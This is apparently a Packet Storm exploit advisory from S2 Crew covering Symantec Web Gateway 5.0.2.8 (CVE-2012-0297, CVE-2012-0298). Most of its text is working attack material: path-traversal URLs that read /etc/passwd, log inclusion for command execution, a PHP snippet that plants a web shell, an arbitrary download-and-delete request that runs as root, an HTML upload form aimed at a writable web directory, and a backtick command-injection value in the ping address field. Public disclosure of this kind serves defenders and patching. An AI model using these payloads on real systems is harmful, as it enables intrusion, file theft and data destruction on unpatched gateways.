Symantec Web Gateway 5.0.28 LFI / Code Execution

2012-06-27T00:00:00
ID PACKETSTORM:114231
Type packetstorm
Reporter S2 Crew
Modified 2012-06-27T00:00:00

Description

                                        
                                            `Software: Symantec Web Gateway  
Current Software Version: 5.0.2.8  
Product homepage: www.symantec.com  
Author: S2 Crew [Hungary]  
CVE: CVE-2012-0297, CVE-2012-0298, ???  
  
File include:  
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd  
  
File include and OS command execution:  
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd  
You can execute OS commands just include the error_log:  
/usr/local/apache2/logs/  
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log  
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log  
  
Make a connection to port 80:  
<?php  
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');  
$cmd = "<?php system(\$_GET['cmd']); ?>";  
fputs($f,$cmd);  
fclose($f);  
print "Shell creation done<br>";  
?>  
  
Arbitary file download and delete:  
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog  
d parameter: the complete filename  
After the download process application removes the original file with root access! :)  
  
Command execution methods:  
1.Method  
Download and delete the /var/www/html/ciu/.htaccess file.  
After it you can access the ciu interface on web.  
There is an upload script: /ciu/uploadFile.php  
User can control the filename and the upload location:  
$_FILES['uploadFile'];  
$_POST['uploadLocation'];  
  
2.Method  
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">  
<input type="file" name="uploadFile">  
<input type="text" name="action" value="upload">  
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">  
<input type="hidden" name="configuration" value="test">  
<input type="submit" value="upload!">  
</form>  
  
The "/var/www/html/spywall/cleaner" is writeable by www-data.  
  
Command execution after authentication:  
  
http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)  
  
From the modified POST message:  
Content-Disposition: form-data; name="pingaddress"  
127.0.0.1`whoami>/tmp/1234.txt`  
  
`